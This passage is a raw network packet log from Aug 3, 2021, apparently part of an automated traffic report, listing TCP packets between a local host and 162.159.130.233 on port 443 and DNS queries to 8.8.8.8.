Aug 3, 2021 22:56:30.662293911 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.662349939 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.662364960 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.662405014 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.662457943 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.662508965 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.663633108 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.663693905 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.663706064 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.663753033 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.663794041 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.663846016 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.663897038 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.663948059 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.663949966 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.664045095 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.664503098 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.664534092 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.664560080 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.664572001 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.664586067 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.664601088 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.664632082 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.665194988 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.665229082 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.665261030 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.665292978 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.665316105 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.665347099 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.665996075 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.666033030 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.666062117 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.666086912 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.666091919 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.666353941 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.666815996 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.666850090 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.666877985 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.666906118 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.666941881 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.666968107 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.673089027 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.673129082 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.673157930 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.673216105 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.675508022 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.675533056 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.675554991 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.675586939 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.675600052 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.675815105 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.675837994 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.675858021 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.675873995 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.675894976 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.675899982 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.675923109 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.677421093 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.677443981 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.677464962 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.677484989 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.677503109 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.677509069 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.677540064 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.677556992 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.678181887 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.678206921 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.678227901 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.678253889 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.678263903 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.678277016 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.678303957 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.679084063 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.679107904 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.679140091 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.679162025 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.679176092 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.679183006 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.679207087 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.679229975 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.679625034 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.680603981 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.680629015 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.680649042 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.680670977 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.680671930 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.680695057 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.680723906 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.680741072 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.681109905 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.681130886 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.681153059 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.681173086 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.681185007 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.681193113 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.681216002 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.682602882 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.682630062 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.682651043 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.682671070 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.682691097 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.682701111 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.682735920 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.683470011 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.683495045 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.683511972 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.683527946 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.683594942 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.683612108 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.689816952 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.689855099 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.689877033 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.689898968 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.689932108 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.689960003 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.692177057 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.692203045 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.692275047 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.694127083 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.694154024 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.694175005 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.694195986 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.694216967 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.694228888 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.694240093 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.694246054 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.694262981 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.694262981 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.694284916 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.694312096 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.694925070 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.694948912 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.694974899 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.694984913 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.694997072 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.695015907 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.695019007 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.695040941 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.695061922 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.695070028 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.695080042 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.695106983 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.697405100 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697447062 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697464943 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697482109 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697499990 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697520971 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697535992 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697551012 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.697594881 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.697762012 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697784901 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697807074 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697829008 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697845936 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.697850943 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697874069 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.697874069 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697915077 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.697917938 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.697941065 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.699938059 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.700177908 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.700203896 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.700227022 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.700248003 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.700263977 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.700270891 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.700292110 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.700294018 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.700319052 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.700331926 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.700342894 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.702389002 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.706489086 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.706517935 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.706585884 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.706609011 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.706653118 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.706675053 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.706696987 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.706718922 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.706722021 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.706753969 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.706906080 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.706919909 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.706965923 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.708888054 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.708940983 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.708970070 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.708980083 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.709022999 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.710875988 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.710939884 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.711035967 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.711638927 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.711697102 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.711735010 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.711760044 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.711781979 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.711823940 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.711860895 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.711884022 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.711899042 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.711913109 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.711936951 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.711978912 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.714075089 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.714118004 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.714167118 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.714207888 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.714235067 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.714243889 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.714262962 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.714287996 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.714332104 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.714350939 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:30.714365959 CEST	443	49729	162.159.130.233	192.168.2.3
Aug 3, 2021 22:56:30.716447115 CEST	49729	443	192.168.2.3	162.159.130.233
Aug 3, 2021 22:56:34.156784058 CEST	49729	443	192.168.2.3	162.159.130.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 22:55:56.898592949 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:55:56.931301117 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 3, 2021 22:55:58.231698036 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:55:58.270011902 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:55:58.294734001 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 3, 2021 22:55:58.298306942 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 3, 2021 22:55:59.105844021 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:55:59.131561995 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 3, 2021 22:55:59.938021898 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:55:59.970230103 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:00.913095951 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:00.937690020 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:01.765974998 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:01.792042017 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:02.591840029 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:02.619050980 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:03.420806885 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:03.447056055 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:04.254513025 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:04.282119989 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:05.119040966 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:05.154381990 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:06.664871931 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:06.700227022 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:07.532284021 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:07.561403036 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:08.237150908 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:08.278302908 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:08.450413942 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:08.476702929 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:09.527693033 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:09.552712917 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:10.330827951 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:10.358331919 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:11.324506998 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:11.353164911 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:12.141448021 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:12.169364929 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:12.975569010 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:13.002007961 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:30.047015905 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:30.079322100 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:31.647320032 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:31.691694021 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:34.575860977 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:34.621447086 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:40.600747108 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:41.616393089 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:42.616389990 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:42.652539015 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:45.626810074 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:46.643323898 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:47.669047117 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:47.702802896 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:51.102046013 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:51.136562109 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:51.158591986 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:51.199634075 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:52.061310053 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:52.093549967 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:52.716566086 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:52.750658989 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:57.548156023 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:57.584635019 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 3, 2021 22:56:57.821424961 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:56:57.854010105 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:02.882054090 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:03.930553913 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:04.931020021 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:04.963404894 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:07.906985998 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:08.955355883 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:10.002260923 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:10.994247913 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:11.027322054 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:15.028481007 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:16.082447052 CEST	52123	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:16.115375996 CEST	53	52123	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:21.136218071 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:22.135423899 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:22.170866966 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:26.165043116 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:27.188684940 CEST	56338	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:27.221488953 CEST	53	56338	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:28.349703074 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:28.383640051 CEST	53	59420	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:28.730896950 CEST	58784	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:28.763786077 CEST	53	58784	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:32.286360025 CEST	63978	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:33.277657986 CEST	63978	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:33.310177088 CEST	53	63978	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:37.313582897 CEST	53	63978	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:38.342689037 CEST	62938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:39.340320110 CEST	62938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:39.373404026 CEST	53	62938	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:43.368331909 CEST	53	62938	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:44.394041061 CEST	55708	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:44.429614067 CEST	53	55708	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:49.499377966 CEST	56803	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:50.497266054 CEST	56803	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:50.529581070 CEST	53	56803	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:53.121031046 CEST	57145	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:53.170388937 CEST	53	57145	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:54.525105000 CEST	53	56803	8.8.8.8	192.168.2.3
Aug 3, 2021 22:57:55.558190107 CEST	55359	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:57:55.593192101 CEST	53	55359	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:00.852359056 CEST	58306	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:01.950614929 CEST	58306	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:01.984244108 CEST	53	58306	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:05.877895117 CEST	53	58306	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:07.038074017 CEST	64124	53	192.168.2.3	8.8.8.8
